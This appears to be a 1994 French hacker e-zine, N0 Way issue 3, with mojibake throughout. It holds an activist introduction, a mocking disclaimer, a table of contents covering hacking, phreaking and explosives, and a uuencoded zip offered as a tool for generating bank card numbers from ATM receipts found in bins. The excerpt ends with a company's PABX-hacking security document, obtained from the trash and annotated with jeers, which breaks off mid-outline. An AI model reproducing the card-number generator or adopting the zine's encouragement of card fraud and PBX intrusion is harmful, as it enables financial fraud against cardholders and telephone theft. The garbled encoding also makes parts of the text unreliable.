4728 lines
215 KiB
Plaintext
4728 lines
215 KiB
Plaintext
|
|
|||
|
-%!% N0 Way %!%-
|
|||
|
|
|||
|
Volume I, Num<75>ro 3, Partie 3.1
|
|||
|
|
|||
|
26 Septembre 1994
|
|||
|
|
|||
|
\-------------------/
|
|||
|
> N0 WAY III <
|
|||
|
/-------------------\
|
|||
|
|
|||
|
|
|||
|
Ce matin, j'<27>coute la radio: "Une famille alg<6C>rienne va <20>tre expuls<6C>e. Le
|
|||
|
village o<> ils habitent se mobilise contre cet avis d'expulsion..." et le
|
|||
|
pr<EFBFBD>fet raconte des conneries sur la situation d<>plorable que devait avoir cette
|
|||
|
famille en France sans travail stable et sans s<>curit<69> sociale.
|
|||
|
|
|||
|
Mais bien sur, dans son mental de politique verreux, il ne pensera jamais <20>
|
|||
|
leur bonne int<6E>gration et aux probl<62>mes qu'ils affronteront en Alg<6C>rie.
|
|||
|
Il ne pensera pas non plus au FIS qui s'attaquera a eux.
|
|||
|
|
|||
|
Je ferme la radio, d<>gout<75> ET LA, ca change: non, je ne me dis pas
|
|||
|
"Qu'est ce que je peux y faire, je suis isol<6F>"
|
|||
|
Je ne me morfond pas en disant: "On peut rien faire contre ces pourris".
|
|||
|
|
|||
|
Si, on peut faire quelque chose et N0 Way 3 est l<> pour se battre <20> sa mani<6E>re
|
|||
|
contre toutes ces pourritures. Maintenant, BASTA...
|
|||
|
|
|||
|
Les hackers&phone phreaks sont l<> !
|
|||
|
N0 Way est l<> !
|
|||
|
|
|||
|
Alors dans cette issue sortie en quatrieme vitesse, j'espere que vous trouverez
|
|||
|
votre bonheur. Ca bouge un peu partout en france, on entre dans l'hiver et
|
|||
|
pourtant on sort de l'hibernation.
|
|||
|
|
|||
|
A Toulouse des assos se sont mont<6E>es pour faire bouger le monde de la
|
|||
|
rave, a Paris c'est une complete effervescence. Chaque jour, je voie avec
|
|||
|
plaisir un nouvel "apprenti sorcier" des r<>seaux me poser des question sur:
|
|||
|
"Comment on hacke?"
|
|||
|
"Comment on devient root sur Unix?"
|
|||
|
"Comment on seize un trunk au Japon?"
|
|||
|
Et les villes suivent: intiative techno & squatts <20> Lyon, bars & magasins
|
|||
|
technos et cyberpunk <20> Montpellier, raves underground <20> Lille, d<>veloppeur de
|
|||
|
virus informatiques <20> Rouen, boite HardCore <20> Tours etc...
|
|||
|
|
|||
|
Des initiatives jeunes se montent de plus en plus souvent dans notre
|
|||
|
soci<EFBFBD>t<EFBFBD> g<>rontocratique: Bars technos, Concerts grunge (<28> prendre au sens r<>el
|
|||
|
du mot), Teknivals (ou teknivaux? :), Bar Cyberpunk, acc<63>s Internet pas cher,
|
|||
|
home studio d'enfer...
|
|||
|
|
|||
|
Aux USA il y a d<>ja les Cypherpunks qui ont fait vraiment du boulot,
|
|||
|
l'EFF s'est battu comme un diable contre le Clipper Chip mena<6E>ant la vie priv<69>e
|
|||
|
de chacun. Matt Blaze a montr<74> que le SkipJack (impl<70>mentation de ce que l'on
|
|||
|
appelle le Clipper Chip) <20>tait facilement "manoeuvrable".
|
|||
|
|
|||
|
R<>sultat: le gouvernement retire le Clipper Chip.
|
|||
|
|
|||
|
La m<>me bataille reste <20> mener en France. En Europe, des choses tr<74>s
|
|||
|
graves se passent sans qu'on en entende tellement parler. En france, les
|
|||
|
"pirates informatiques" sont montr<74>s du doigt comme de petits vandales
|
|||
|
informatiques, Satan<61>s gosses, tous les m<>mes.
|
|||
|
|
|||
|
Alors, lisez N0 Way, et R<>AgIsSeZ !!!! Faites comme tous les cyberpunks
|
|||
|
de France: bougez vous et devenez actif dans le combat contre cet establishment
|
|||
|
qui nous <20>touffe.
|
|||
|
|
|||
|
Dans ce num<75>ro nous vous proposons un superbe article de notre ami Arscene sur
|
|||
|
la dissimulation de fichiers, un fichier r<>pandu mais d'une qualit<69>
|
|||
|
extraordinaire sur l'ins<6E>curit<69> d'Unix par Dan Farmer et Wietse Venema,
|
|||
|
le manifeste g<>nial de "The Mentor" traduit pour la premi<6D>re fois en
|
|||
|
Francais et plein d'autres superbes articles "mortels"...
|
|||
|
Vous pourrez vous "fendre la gueule(tm)" avec un article en particulier.
|
|||
|
|
|||
|
Arrested Developpment, official distributor in Nederland (NL): +31 77 547 477
|
|||
|
The One propage -- N0 Way -- en France et en Europe: +33 49 88 76 91 (BBS)
|
|||
|
+33 48 70 10 29 (Minitel)
|
|||
|
+33 48 58 46 17 (Minitel)
|
|||
|
|
|||
|
Vous pouvez me joindre:
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
Sur RTC 0NE ! |\
|
|||
|
Sur 3615 TALK | > Bal: NeurAlien
|
|||
|
Sur The 0ne ! |/
|
|||
|
|
|||
|
Sur Internet !!!!
|
|||
|
Email: an133729@anon.penet.fi (signez vos messages avec votre Email).
|
|||
|
|
|||
|
>>>>>>>>>>>>>>> TOUT ARTICLE ACCEPTE *<<<<<<<<<<<<<<<
|
|||
|
|
|||
|
"This is the network of the life" --Corona.
|
|||
|
|
|||
|
++NeurAlien.
|
|||
|
|
|||
|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
|
|||
|
Disclaimer:
|
|||
|
Cette publication <20>lectronique peut contenir des informations,
|
|||
|
donn<6E>es et articles interdits dans certains pays. Si les
|
|||
|
informations de cette publication sont interdites dans un pays,
|
|||
|
il est du devoir du lecteur de v<>rifier qu'il a bien le droit de
|
|||
|
poss<73>der et de lire (ahahahaha :-) cette publication. Les auteurs
|
|||
|
et <20>diteurs ne sont en aucun cas responsables d'une mauvaise
|
|||
|
utilisation des informations publi<6C>es. Pour les attaques en
|
|||
|
diffamation et autres conneries bonne pour les censeurs, allez
|
|||
|
voir qui vous croyez <20>tre l'<27>diteur.... Pour la simple et bonne
|
|||
|
raison que de responsable de la publication et d'<27>diteur il n'y
|
|||
|
en a pas!!! Les informations fournies dans cette publication sont
|
|||
|
<20> titre informatifs uniquement. Nous ne vous garantissons rien et
|
|||
|
si ca vous plait pas allez lire autre chose! Hahahahahahahahahaha...
|
|||
|
Toutefois, la diffusion et la lecture de ce bulletin PRIVE est
|
|||
|
restreinte <20> toutes les personnes dans l'underground informatique.
|
|||
|
Ne font pas partie de l'underground informatique tel que je le concoit
|
|||
|
les personnes suivantes: Membres d'<27>quipes de s<>curit<69> publiques ou
|
|||
|
priv<69>s, personnes affili<6C>es <20> des agences gouvernementales,
|
|||
|
informateurs quelconques, responsables s<>curit<69>s et autres empaff<66>s se
|
|||
|
croyant sup<75>rieur de par leur titre.
|
|||
|
Lire ce bulletin en n'<27>tant pas dans l'underground informatique
|
|||
|
constitue donc une violation des lois de Copyright et de Propri<72>t<EFBFBD>
|
|||
|
Intellectuelle ainsi qu'un acte de malveillance envers les auteurs et
|
|||
|
les r<>dacteurs car cela revient <20> lire des informations propri<72>taires.
|
|||
|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
|
|||
|
Apr<70>s <20>a, c'est pas la DST qui peut nous faire un proc<6F>s pour
|
|||
|
N0 WAY...
|
|||
|
"Quoi? Vous avez lu de la documentation propri<72>taire et secr<63>te alors que vous
|
|||
|
faites partie d'une agence de s<>curit<69>????"
|
|||
|
|
|||
|
-%!% N0 Way %!%-
|
|||
|
|
|||
|
Volume I, Num<75>ro 3, Partie 3.2
|
|||
|
|
|||
|
Table des mati<74>res:
|
|||
|
~~~~~~~~~~~~~~~~~~
|
|||
|
# Titre Auteur Taille
|
|||
|
3.1 : Introduction N0 Way Team 6 Ko
|
|||
|
3.2 : Table des mati<74>res N0 Way Team 2 Ko
|
|||
|
3.3 : Trash & Carte Bleues Field 9 Ko
|
|||
|
3.4 : Piratage des PABX -- Premier Acte. *Operator TDF* 17 Ko
|
|||
|
3.5 : La conscience d'un Hacker The Mentor 4 Ko
|
|||
|
3.6 : Data dissimulation techniques Arscene 20 Ko
|
|||
|
3.7 : Playing hide 'n' seek in CyberSpace NeurAlien 21 Ko
|
|||
|
3.8 : Cartes T<>l<EFBFBD>phoniques -- Premier Acte. D. O'Connell 9 Ko
|
|||
|
3.9 : L'Underground Francais sous developpe? * NeurAlien 16 Ko
|
|||
|
3.10: L'art du Social Engineering NeurAlien 7 Ko
|
|||
|
3.11: "Breaking Into Your Site" D. Farmer & W. Venema 53 Ko
|
|||
|
3.12: Plaisanter sous Unix NeurAlien 10 Ko
|
|||
|
3.13: Du cot<6F> d'Internet NeurAlien 19 Ko
|
|||
|
3.14: L'explosif? Tient tient... Inlandsis 7 Ko
|
|||
|
3.15: Prime & The PrimeOS environment * NeurAlien 6 Ko
|
|||
|
3.16: Rave Revolt NeurAlien 4 Ko
|
|||
|
3.17: Multics * NeurAlien 7 Ko
|
|||
|
3.18: Tel - Trixx NeurAlien 6 Ko
|
|||
|
|
|||
|
Nota: une <20>toile (*) apr<70>s le nom de l'article veut dire que cet article a <20>t<EFBFBD>
|
|||
|
fait pour CORE DUMP et ressort pour N0 WAY.
|
|||
|
|
|||
|
-%!% N0 Way %!%-
|
|||
|
|
|||
|
Volume I, Num<75>ro 3, Partie 3.3
|
|||
|
|
|||
|
|
|||
|
>--------------<
|
|||
|
> TrAsH &&& C.B. <
|
|||
|
>--------------<
|
|||
|
|
|||
|
Le fichier suivant est <20> uudecoder. Si vous savez pas faire c'est vraiment que
|
|||
|
vous avez autre chose <20> apprendre que la contrefacon de num<75>ro de cartes
|
|||
|
bancaires.
|
|||
|
|
|||
|
Ce petit utilitaire a <20>t<EFBFBD> <20>crit pour ST (GFA basic) par FIELD.
|
|||
|
Il permet de g<>n<EFBFBD>rer des num<75>ros de carte bleue <20> partir des bouts de papier
|
|||
|
trouv<EFBFBD>s dans les poubelles des distributeurs automatiques.
|
|||
|
|
|||
|
Vous pouvez contacter Field sur The 0ne. +33 1 48 70 10 29
|
|||
|
|
|||
|
alors, revetez votre cyber-combinaison, prenez votre portable et votre radio-
|
|||
|
modem 28800 bauds puis rendez vous <20> l'ATM le plus proche pour une autre
|
|||
|
session de d<>lire avec N0 Way...
|
|||
|
|
|||
|
++NeurAlien.
|
|||
|
|
|||
|
----------------------------------CUT HERE-----------------------------------
|
|||
|
section 1 of uuencode 3.07 of file cb_nums.zip by R.E.M.
|
|||
|
|
|||
|
begin 644 cb_nums.zip
|
|||
|
M4$L#!!0``@`(`&1F)QWUW^]R`04``(X+```+````0T)?3E5-4RY'1D&M5LUO;
|
|||
|
M&T44GQW;&W^LG<3Y:H*3C*VH::,VV$DV:1!2V8UWBHMC1W9:A%0)F62K&KEV'
|
|||
|
M\4=4]51%XMX#!X[\$1QZ[*DJ$D*<N.',2@@AU`-';N7-?MG+6B8'DOSFO?ST(
|
|||
|
MWF_>FYW9612X0Y6;JE(M'&PCZZ>/D'`5L'D)M/V(O$0H^CO@3X1BKQ&2DH#Y(
|
|||
|
M2T#U(_&$0RS=.]0JY<!1N2I6CRL%K20H@BH<"'E!PTH.*UM8V<;*#E9DK.QB"
|
|||
|
M90\KM["R'U!R64`.L`78!NP`9,!N\*A2SH?XD#/'[9`YA^G+YKAGCONB&9.S5
|
|||
|
MS+9EY``$!T$I&P0'YL]B-8?5+:QN8W4'JS)6=[&ZA]5;6-T/J%"%"E6H4(4*0
|
|||
|
M5:A0A0H::FXW0"L:LKN#1@1EJ!7%[.82K8A:Z:`\T$&A0NGHWO'$?:U2H`4M7
|
|||
|
M6M(^_=Q>/T@P"PYII7R!1K1J52EL9K/94%Y3(8,6#CXN:!4A)VRA,/H;A2DRE
|
|||
|
M[81IKYA6#+ZE%.V&7O5OY%O-IOZ,-'1RTCK5"?PU:N2+6O.KGDZND1UR\JC^S
|
|||
|
M\&%;[Y#KY(.T@2G:@"PRR&KV'I^W6SQO?Q`+D2)%5W&QGZKH)X_T-H#4SO03`
|
|||
|
MR.@,PC(\:A,?';Z!_;J1_N]@BD1<A#$QR$'4["Y"#Y&(4G:/O&<"OX$[9/7G'
|
|||
|
MX_[T@P.E<JQ5;;-9RA&*UH)K?:&<=G3\,:`11;=`XR?Z!DFXJ/+("<@L05]W(
|
|||
|
ME&Y7;W;KK299=S/6B?ZTWNG6ZEUR>OYEC=P@]08YJQ&]V]9)6V^V'I\3?2AA,
|
|||
|
M:WV3HE3H>3]R4FMW]<YF,]<8^%MVC:UQ-7:AZS7W";>'UH"O2%C((NDE-6W<_
|
|||
|
MM@M@DV`W?D7?F2^*(*8ZNB+L(.&V@=,_\+F$M#E"KYP/N#SV\$&7#WCXD,L'#
|
|||
|
M75Z"&<.R`:[E1V0CX/A1V0@Z?DPV0MSG.N';ACBJGHC+>^N)NKRWGIC+!SV\[
|
|||
|
MY/(A#Q]W>='#)UQ^PL-/NGS8PT^Y?,2S#@G9"#O]3LI&Q/&G9"/J^-.R$7/\B
|
|||
|
MI&Q(CC\C&W''GY6-A.//R<:DX\_+QA3W^9X0^)EQ]P3_C^\!!'M@%NPB"T]<0
|
|||
|
M/+=V`1PD-,_/S-T\6YR\</;&72=R,73QPMDOV-YU4UR+(9$MBBQ"K<@E%AVA*
|
|||
|
M^2U;\FDNL:5QFDLBB]F:*2:-T'S+4C[-%$N-TTR)+&YK+K.$7_.3C]BR3W.92
|
|||
|
M+8_37!;9I*VYPJ9&:'[#5GR:*VQEG.:*R*9MS566'*'Y!UOU::ZRU7&:JR*;@
|
|||
|
ML34)F_5K%C]DQ*=)&!FG240V9VNFV?P(S1<L[=-,L_0XS;3(%FS-#$-A-QLB@
|
|||
|
M.;?&4&R82YCS_,;6)):Q]CRFQ]:;^_`7VD1/<?$S?OI6S#,8)9D]%@9$`%%`]
|
|||
|
M+-,7."<!XH`$8-+FI@#3@"1@QN9F`7.`><!"IC]'1OUD^$D<NC$>#.XK3/[7:
|
|||
|
M"IR.=7L5!V<=TR?F>BVP!=%^+H%W])WU7$H_LH69P3.8<6\&GA%G\1$9KUE\D
|
|||
|
M*./4O5-XAL0D3X;Y3$JOF#3#-IP[>Q=NS?GB>JM]6F_6NGJO3;XFW7:K=W;.V
|
|||
|
MFT*9_K3]+=&!*[-1/X4K\%^KR#N-FO>\U>E@]+[IIBFU[)7A.%KY:KMYOB
|
|||
|
M]1KZLYMGK5Z'])KPD=&S+F;GH^-:^?W2=9(VDM3JN:P:R??@(T$P38O:MZQAO
|
|||
|
M[:YRA2:1*/PU5`N?/8B^_P=02P,$%`````@`X'OU'!=FX(YY`@``\P8```L`(
|
|||
|
M``!214%$7TU%+D=30U/`#FX=(0CV\W)A5Z>P62%:V]@X5E?#4%/7Q-+"0M?<2
|
|||
|
MS-)0(2"Q*+-8WZTH,2\Y%:@$AX&;%4Z>I0[8K;`98N`NA5MP?]VY<^?^_?M`M
|
|||
|
M4@&/$!9%"@K[@>;`#82!V_?!)$CI_=MP(3U4(9`B/51%$``U$`F`I/44[MR_?
|
|||
|
M#01WP#P(@2($Q+^01'BY[@-MN`V"0./OW84:=/OVIMNW[X*X0/P+50BB"$@BA
|
|||
|
M%$$-!ID!=--M!8B!</M!FL"*(5+H0O<A0`%-$1AC&/>+H'%P0,@XN&^!&*04$
|
|||
|
MZ!60T`]4(84[4/?=AXN09!QV&X`8IW'W;X-C'=EGMS$]"Q4"I30P0"BZ#XG,U
|
|||
|
M^U@BXP=A`Y%"#ZX(;@*2@7=0DLMM1$KXB6K@O=N0P$-6=.<V#&-)PC^!?@(IW
|
|||
|
MO8^1@A"._JF`4(21K<`Y#V2KPIW;"$-O*R"Y`*SH)[(B&$#*IP?@@I`,#4ZC:
|
|||
|
MD*`!!SB4ANE'4P0!-Q$&GJ!2T;0'8N`!U/)OLX);9DJ^7VJ)E9&5D8F!OI&AF
|
|||
|
MD:&>D:%"<$%B439(N-C`($\A.3\W,R]=83-:X7D3+1I`X,`1$@#(@`!G?8\`%
|
|||
|
M$PM]QQ)@6:WOD9B<K9ZG4)!1E)J8#;13WR4_N5@_(!-(!.>7YJ7\"DY-+LDOL
|
|||
|
M4C#(2]5W+2S-S,NOT'?U-M!W*RTJR2Q+U8>X*"C86=\OM5PA.+&DM"A/(=PCF
|
|||
|
M\)=S?EY)47Z.0DAJ8JZ^8U%V1F*N@AM0/""C"&@E4#^0\,M7"$^L5$C)+"Y1\
|
|||
|
M*,XL2?V%\)^BP@<_@P\*08XAG@80IHNCIT^D@H^GKV<(1"`@R#/,T3D2PG%T?
|
|||
|
M"@WV#'-5<'/T=E50Y.4"`%!+`P04````"`"2H@(=BOTJL54"``#Y!0``#```C
|
|||
|
M`%)%041?1$E3+E546%,`@0T;-^$"&S<`Y>^`52GHX5?(RP4S[/9],+BM`)9!J
|
|||
|
M\("&Z8'5_$15B`K`"I$,4[A]7V'#!IAA<![894"3_H$<AJ00%6`:IK`!V3`%7
|
|||
|
MF!JHRQ`*,<W"-.P^BF'W$88IH'@3[C&(*5`NNF$P*R"&(2P$^>\^./B18PI54
|
|||
|
M/7H$*&P$`5B(0GC(+D.+S=MP%;@-0P5($0"*`07B#<.2=K!%`$(*B4(S[#Y6@
|
|||
|
M`/?F?4@,(`Q#J,!B&.Z$#8U(HG.`PBV%(Q0"A?U0LS8#<>@OA?>_%%Q^*3SY.
|
|||
|
MI1#T2\$=3!K\0H@#00A85N,7B&$`%E\+Y@:#9#?#'':`<H?=A)D%LC3CB4+>E
|
|||
|
MDW*%D"]/\EP4\N<KK/4[].3+^V4AF09YCCD*X8E![Z(4D@U*@[ZL?1>TUB]='
|
|||
|
MP>"+^[+W:X.7A:PUR-,#&C0W/U0]1<%GK7>JPB$#A:0G"LO>*X2&P+4HK%`P6
|
|||
|
M*`(I*E)XF._XQ44AU[%2X>$[D)*4M<4A7]8FA1[RS'^O4+RVY(G""K##(.H5$
|
|||
|
MLD*+0Q3*'?-"%(H-<I\HY+LI`(U4F+\V[PE0M.A)%=!DGW<A"I4&I0H:RWQRC
|
|||
|
M%`SRX(H\`A7R@Q2L8-X,?>_R),@]R!](*X0\T0@Q>+_6.5C!,??)E[7)CGD*[
|
|||
|
MX4#E5@I!3QX^\5'P>;(V.#3HB8*VH;Z%@:&N8["WKLG:$$7\)CTI#<H/>`<W1
|
|||
|
M*<3CB8+!^R<*#Q\&`[5H&QOK&YI86N@&/0DF9)!C\=IE?B!IB$$N&D#O_'X2F
|
|||
|
MY./OZ`(TR,+42-_(W%`WV"#<PS'$GI<+`%!+`P04````"`#H92<=:TQK`&8'R
|
|||
|
M```J$0``"P```$-"7TY535,N1$]#K5C?;]M&$GXWX/]AWF3'%FDGOL0QF@"VF
|
|||
|
M$C<IDM9-?%?@C@=A1:WLO?"'LB3=7$S=@P"_]*^^;V:X$M4F=0N43B*2N_/-`
|
|||
|
MS#??S%KQ=G9"YZ]?OGFQO45\S7UYY4V>6YI;G]NZ-D5-4TO>UKYL;JS'0T5%Y
|
|||
|
MDR]]6?%":GQMJ;.>F"(USENZH[GQKM;=3RF]=K.9QVUE27`8M6H\97A'P;IV.
|
|||
|
MZ0=;*ZKUM7$%[EU5>S=I:MMX69FX+,.F:'MK>VMD4T>V0H!ED5)F\)DVN2UJV
|
|||
|
M4[NRH&G32^=CXU;>K?B<&N!G`^,1'5X)"X?1/U]?1'3F;`$+CJ,'86A9+\&$'
|
|||
|
M&<(Z<]62L.O;\]/AF:E<2O]ASHK*BB$G5LV7J3/86-M*B+@829ZP+@:F\25(-
|
|||
|
M,$W:%.QCDOV2,V\9QVBF#;,(^(O3]Z/3-\CV[]AE&YH.7#$K?2X95BL.OT;3>
|
|||
|
MR?86X!%_,:6BS"<`Q>*+TS/:Z9L@C+ID3`Y];;V+PMR4386<(04"DI9(7[IBR
|
|||
|
MBOU<23!?E4JRU35S8UP-:[^LG5\2E])UO'3B83?O7I]1V5!:YO/:1C3JK[$HK
|
|||
|
M>)W+RQM*T`T_\ZR!LFJN;6WSN>3:TQ=B<YE2G)8>;^8E,K]#Z)8563O+EFLOM
|
|||
|
MHS-J:B>UG)?"95<@UCM2B'!K/\%19D\(*6R$/]+HCIX^.:*#PX>/Z.AOCY_0.
|
|||
|
M\=/#`\C#?H$KZPWG=$(/'_%6[)2-G&8O6A&S:3XA+W.C[><+9U'759IP#BXXL
|
|||
|
M2>F^T':0R7<#X\!Z;OS'9@GY0I%3QE`Q=TW%]9>2UE;@*XZ512WMAXJ`PV+PI
|
|||
|
M7PA>Y:DI`YW[`I+KBBS_3&T.<=G/7"1N/0IS(E58@00-0)]P5P&Z:F8S)U-EP
|
|||
|
M)L."!3RWM>,V014F-N,WO88=LO6-Q"H]:S4%J1@@T9VFJN`2XJB<=H#[C$RM7
|
|||
|
MCHEW%K9,PAWE9=%K:,2B4VYSPK%8I&MU3-C^N$/-;]#2S%F*_E7<;&/(L9!K,
|
|||
|
M,=8Q@5L1,%>JT2Z>^U\J.CX(P!&]SI1-H08JF6*=K4OM9EF#O\*F-0+DKG\[B
|
|||
|
M^N$MEPJ(:%[/1#6I4J*4,6,BZ$D9*L@MD#N6CH0%<MZB<^MFOIR95$;F$@(1A
|
|||
|
M-@(7:TH#"2'],$%7;`'N37]<]N5!==D`=V`FI9]N=A'$R^($'%=<IKFEH[76:
|
|||
|
M=Z2_NNZ$>U>9BLZ^O\!P`FL5]U167H7)-662_!<],+RVV5!*P\WF6>(BIDD8V
|
|||
|
M^5-1HZ\8B`>93>45"H_PF6D]L124MS:B3--4F`^"`B5!UEZZ%,?+U4JXJ8Q>S
|
|||
|
MH=U5?%[HK*RDI=@W7H'-JN%5B!H?&,N3I12<>>YKBM,IK*@03F6^`:O)2R=%V
|
|||
|
MV9Q36C2QWD%9W<PIZ*/'AT<BI5WIE._6_AD-*+TSK)LZH<#=&<O#"HE+AW9#T
|
|||
|
M(<,TT,YFXDR^S%SINP/K;O-(92]=7*LS$*:8!,.,!?4/AIRS%#]W#.>:LEDUG
|
|||
|
MPKO+T?"'[U]VOT,0Y:Z`?49'Q\,G!\/#@^'#I\138F*R\)O.]M8EY&BE($SC>
|
|||
|
MG1SL4RA_[I?I$IKEDA52/EGZV`SN,,RXS3A4GN8I$IHQKH[(U%1=]5BI.#HP;
|
|||
|
M\SP/%9[IE9ED[(E/X>TMG/$#/70Z"JW,ROZY+L6@KUW#9T-Z@1+-7"8,5G9*5
|
|||
|
M];5O>($-]XCB7YE$]+M7O-X4L>.XE1</?N.Y'/;0!OA1\W8\'D?1N$/:`T0<?
|
|||
|
MXQ5>C&4EXEO:ER>YY5W\3SMH!^L`<"6=[V`LS@90;;<<]T*.@UD27H['+2ZV3
|
|||
|
MVEV%F224C,=Q,):]+2),QNL(^1.>$UKP,S8LU#P.(`OQU"8!L7\M:!RWH5RWX
|
|||
|
M8AL+7,Q_NOLUSP(2WW:/"K5(-.68@XHYV`YPC\!&JYRTBH?`^95P+RA)*S=)^
|
|||
|
M>%3@!=]%RO.NIAP%L@`GCD)&XUW>V:ZH3/1OLGJ\[2J4:)WE/@XIQQTC0IQ$K
|
|||
|
MJ-ERT'M*9;R)R!:W?0J3/IYDW++A0IG9462%C=>W29>EL-HQR>%A^T+A]L+F?
|
|||
|
M7?T(BDG&.VNTE:@6BIUH#(N.WUB(7P7'*.,.[#9DC?L!*$Q6R8B9PB?CF%9NF
|
|||
|
M-0:`19UWYFM'_F@B(M6D72E5-L:B`7E\UE69QKH6`HLT-+9J^2G1#A[2\`'^&
|
|||
|
MALIIZ61CI!"J@R1P\6`]=D)OM2$I#;D-XN=.ZV_\53WC(&`=$FP\Z&^):#U'N
|
|||
|
M,`6HOPZCL[/WNIS$7YB$>QM/@TW8:.W@-Q>FV[._]MK>>H]?RDI/!X6-7WXH1
|
|||
|
MX_/SR_@E3I6B_!2?-_C*<6/C4__AVN3TTZL?:?B_(7WS7#Y&.,=\F=&EQ=JY6
|
|||
|
MMT5Z3:]^O"_"Y_3J`H<;_53Z;$KXZFGIFWLBY`.#Z")^%9_&HWW8'QWOT[G)W
|
|||
|
M<)#NT_O+?3K-W979Y^^G/QMO/^_3M2OJ:I]&UX8_^-S*2WR_(-(SYGY:GM,[&
|
|||
|
M5USA.^?/=')/?*L(_X6Z/L+/OR'8'3I$TQ[AU^HA'>/G"3X?X^E03K]#^K:DH
|
|||
|
M@_B-/%S@?QHJJ/`<WW)QH/_1"/_4M;WU?U!+`0(7!10``@`(`&1F)QWUW^]R3
|
|||
|
M`04``(X+```+``````````$```````````!#0E].54U3+D=&05!+`0(:!10`*
|
|||
|
M```(`.![]1P79N".>0(``/,&```+````````````(````"H%``!214%$7TU%=
|
|||
|
M+D=30U!+`0(:!10````(`)*B`AV*_2JQ50(``/D%```,````````````(```'
|
|||
|
M`,P'``!214%$7T1)4RY55%A02P$"&@44````"`#H92<=:TQK`&8'```J$0``\
|
|||
|
M"P```````````"````!+"@``0T)?3E5-4RY$3T-02P4&``````0`!`#E````D
|
|||
|
MVA$``+,!1&EZ('=A<F4@=V%S(&QE96-H960@9G)O;2XN+@T*R<W-("#;V]O;)
|
|||
|
MLB#;V]O;LB#;V]O;LB#-S;O)S<W-(%LK,S-=+2@Q*2TT.3@X+3<V.3$@<V]OT
|
|||
|
M;B!A;B!54U(@5C,T(&YO9&4N+BX@S<W-NPT*NB`@("#;LB#;LB#;LB#;LB#;N
|
|||
|
MLB`@("`@(+JZ(%-E8W1O<B!/;F4O17%U:6YO>"]%2T\O1G5R=&EV92]&1E0O<
|
|||
|
M07)K:&%M+TI&1B!72%$@N@T*NE1H92#;LB#;LB#;LB#;LB#;V]NR($)"4[JZ/
|
|||
|
M("%&=6-K(2]#;VYT<F]L(%1E86T@1DA1("T@4&AR86-K+TYO(%=A>2!D:7-T9
|
|||
|
M('-I=&4@N@T*NB`@("#;LB#;LB#;LB#;LB#;LB`@("`@(+JZ(%!#+T%T87)II
|
|||
|
M+TA0-#@O4$A!0R]-:7-C96QL86YY("T@2G5S="!K97=L('=A<F5Z("$@N@T*=
|
|||
|
MR,W-("#;V]O;LB#;LB#;LB#;V]O;LB#-S;S(S<W-($ME=VP@<F%T:6]S+"!NZ
|
|||
|
D;VYE(&9O<B!L;VYG+61I<W1A;F-E(&-A;&QE<G,@S<W-O`T*6
|
|||
|
``
|
|||
|
end
|
|||
|
sum -r/size 57111/7388 section (from "begin" to "end")
|
|||
|
sum -r/size 39491/5256 entire input file
|
|||
|
----------------------------------CUT HERE-----------------------------------
|
|||
|
|
|||
|
-%!% N0 Way %!%-
|
|||
|
|
|||
|
Volume I, Num<75>ro 3, Partie 3.4
|
|||
|
|
|||
|
|
|||
|
,{$' Piratage '$},
|
|||
|
. __=/%(~{; ;}~)%\=__ .
|
|||
|
~\|[:&^ des ^&:]|/~
|
|||
|
`\![! !]!/'
|
|||
|
`+# P.A.B.X #+'
|
|||
|
|
|||
|
PART I
|
|||
|
|
|||
|
Avant propos: Apparemment, en France aussi les grandes entreprise se
|
|||
|
mettent <20> r<>agir contre le piratage des PABX. Ce document provient d'une
|
|||
|
grosse entreprise francaise et concerne le piratage des PABX.
|
|||
|
Interressant de voir comment le monde des hackers est aid<69> par les entreprises.
|
|||
|
J'ai trouv<75> ce document dans les poubelles du secretariat de l'entreprise qui
|
|||
|
produit ce document! arf'''
|
|||
|
ps: ce qui est entre crochet vient de moi. ++NeurAlien.
|
|||
|
|
|||
|
--------
|
|||
|
|
|||
|
Le piratage classique des systemes telephoniques PABX
|
|||
|
|
|||
|
Societe Operator TDF
|
|||
|
|
|||
|
[ya pas de copyright, on est inattaquable hehehe]
|
|||
|
|
|||
|
Le Piratage telephonique.
|
|||
|
|
|||
|
Sommaire:
|
|||
|
1<EFBFBD>) Approche chronologique en terme de piratage de ligne:
|
|||
|
A) Premier controle de facture
|
|||
|
B) Controle de la facture suivante [Kewl, ca nous laisse 4 mois tranquile]
|
|||
|
C) Prise de conscience [ptin ils sont lents ;) ]
|
|||
|
2<EFBFBD>) Approche chronologique en terme de perte de contrat
|
|||
|
A) Baisse du chiffre d'affaires
|
|||
|
B) Augmentation du CA du concurrent
|
|||
|
C) Prise de conscience [bin oui, t't'es fait niquer! ;) ]
|
|||
|
3<EFBFBD>) Les types de piratage:
|
|||
|
A) Ecoute des communications
|
|||
|
B) Detournement d'une ligne
|
|||
|
C) Recherche des lignes modem
|
|||
|
D) Sabotage des syst<73>mes [Beurk!!!!]
|
|||
|
4<EFBFBD>) Les m<>thodes de piratage:
|
|||
|
A) Piratage d'une ligne.
|
|||
|
B) Piratage d'un base TSF. [Telephone Sans Fil je crois]
|
|||
|
C) Piratage des fonctionnalit<69>s d'un PABX.
|
|||
|
D) Piratage des auxiliaires d'un PABX [Messagerie vocale par ex.]
|
|||
|
5<EFBFBD>) Les moyens <20> mettre en oeuvre:
|
|||
|
A) L'acces des locaux
|
|||
|
B) Protection des informations
|
|||
|
C) Destruction des informations p<>rim<69>es
|
|||
|
D) Sauvegarde de l'information
|
|||
|
6<EFBFBD>) Les moyens de controle:
|
|||
|
A) la taxation t<>l<EFBFBD>phonique
|
|||
|
B) L'observation de trafic.
|
|||
|
[==Deuxieme partie dans le prochain num<75>ro==]
|
|||
|
C) Le controle qualit<69> des lignes.
|
|||
|
7<EFBFBD>) La protection des lignes des syst<73>mes [a partir d'ici, c'est sur le mec ]
|
|||
|
A) Piratage du mot de passe [ qui a <20>crit ca avait fum<75> ou ]
|
|||
|
B) Mot ou clef al<61>atoire [ gobb<62> un acide ]
|
|||
|
C) Cryptage des lignes
|
|||
|
D) Cryptage du disque dur
|
|||
|
E) r<>orientation des appels
|
|||
|
8<EFBFBD>) Les supports de transmission.
|
|||
|
A) Les supports radio.
|
|||
|
B) Les supports physiques.
|
|||
|
C) Les cabines de brassage.
|
|||
|
D) la gestion des supports.
|
|||
|
